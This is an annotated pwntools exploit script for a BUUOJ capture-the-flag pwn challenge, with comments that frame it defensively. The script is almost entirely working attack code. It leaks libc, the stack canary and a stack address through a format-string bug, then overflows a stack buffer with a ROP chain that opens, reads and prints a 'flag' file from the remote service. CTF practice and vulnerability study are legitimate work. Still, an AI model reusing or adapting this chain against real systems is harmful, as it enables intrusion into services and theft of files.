# pwntools exploit script for a BUUOJ pwn challenge: the same script drives
# either the remote service or a local ./pwn, selected by `flag` below.
#
# Defensive reading of what follows: the script chains two memory-safety bugs
# that it relies on in the target -- a format-string leak at the name prompt
# (defeats the stack canary and ASLR by reading them off the stack) and a
# stack buffer overflow at the help prompt (turned into a ROP chain). Neither
# the canary nor ASLR helps once the values are leaked; the fix is in the
# target's input handling, not in the mitigations.
from pwn import *
import sys  # imported but never used in this script
context.log_level='debug'  # pwntools logs every send/recv, useful when replaying the exchange
context.arch='amd64'       # makes p64() pack 64-bit little-endian values below
flag=1  # 1 = remote target, 0 = local process. NOTE: this name is rebound to an address later on.
if flag:
    sh = remote('node4.buuoj.cn', 29107)
else:
    sh = process("./pwn")
# libc matching the target's glibc (2.23, Ubuntu 16.04 build per the path). The
# hard-coded offsets further down (0x6ffc4 and the libc gadgets) are presumably
# taken from this exact build and are not portable to any other.
libc=ELF('/home/wendy/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6',checksec=False)
elf=ELF('./pwn')  # loaded but never referenced below
# Short aliases for the tube helpers (sa, sl, sd and rc are unused in this script).
sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
ti = lambda : sh.interactive()
leak = lambda name,addr :log.success(name+":"+hex(addr))  # log a leaked value as name:0x...
# Stage 1: information leak via the name prompt.
# The name is three positional %p conversions; this only yields anything if the
# target passes the user-supplied name to a printf-style function as the format
# string (format-string bug). The script treats stack slot 25 as a libc
# pointer, slot 27 as the stack canary and slot 28 as a stack pointer.
# Mitigation on the target side: a literal format string (`printf("%s", name)`),
# -Wformat-security / -Werror=format-security, and _FORTIFY_SOURCE, which
# rejects %N$ specifiers in writable format strings.
pay='%25$p.%27$p.%28$p'
pay=pay.ljust(0x20,'\x00')   # pad to 0x20 bytes so the string below sits at a fixed offset in the buffer
pay+='flag\x00\x00\x00\x00'  # NUL-terminated "flag" -- later passed to open() by the ROP chain
sla('What is your name?',pay)
# Parse the three leaked values; they are printed as 0x... and separated by '.'.
ru('0x')
libc_base = int(sh.recvuntil('.',drop=True),16) - 0x6ffc4  # 0x6ffc4: hard-coded offset of the leaked pointer within the libc build above
leak('libc_base',libc_base)
libc.address=libc_base  # rebase so libc.sym[...] resolves to runtime addresses
ru('0x')
canary = int(sh.recvuntil('.',drop=True),16)  # leaked stack protector value, reused verbatim in stage 2
leak('canary',canary)
ru('0x')
stack_addr = int(sh.recvuntil('\n',drop=True),16)
# Presumably the address of the "flag" string inside the payload above, at a
# fixed distance below the leaked stack pointer (0xe0 is hard-coded). This
# rebinds the module-level `flag` from the remote/local switch to an address.
flag=stack_addr -0xe0
leak('flag',flag)
# Stage 2: stack buffer overflow at the help prompt, used to run an
# open/read/write ROP chain (no shell is spawned; the file is read directly).
# The overflow itself is the defect to fix in the target: the second read must
# be bounded to the destination buffer, and the canary only fails here because
# stage 1 leaked it.
pop_rdi=0x0000000000400943            # fixed address -- looks like a gadget in the (non-PIE) binary itself; inferred from the value
pop_rsi=0x00000000000202f8+libc_base  # libc gadgets, rebased with the leaked base
pop_rdx=0x0000000000001b92+libc_base
# Frame layout as the script assumes it: 0x70-8 bytes of filler, the leaked
# canary (so the stack-protector check passes), one 8-byte slot (presumably
# saved rbp), then the return-address chain.
# NOTE(review): 'a'*... + p64(...) concatenates str with bytes, which only works
# under Python 2 pwntools; on Python 3 this line raises TypeError.
orw_rop='a'*(0x70-8)+p64(canary)+p64(0)
orw_rop+=p64(pop_rdi)+p64(flag)  # open(flag, 0)
orw_rop+=p64(pop_rsi)+p64(0)
orw_rop+=p64(libc.sym['open'])
orw_rop+=p64(pop_rdi)+p64(3)     # read(3, flag, 0x50) -- assumes open() returned fd 3 and reuses the same buffer
orw_rop+=p64(pop_rsi)+p64(flag)
orw_rop+=p64(pop_rdx)+p64(0x50)
orw_rop+=p64(libc.sym['read'])
orw_rop+=p64(pop_rdi)+p64(1)     # write(1, flag, 0x50) -- echo the buffer back to stdout
orw_rop+=p64(pop_rsi)+p64(flag)
orw_rop+=p64(pop_rdx)+p64(0x50)
orw_rop+=p64(libc.sym['write'])
sla('What can we help you?',orw_rop)
ti()  # hand the connection over to the user to read the output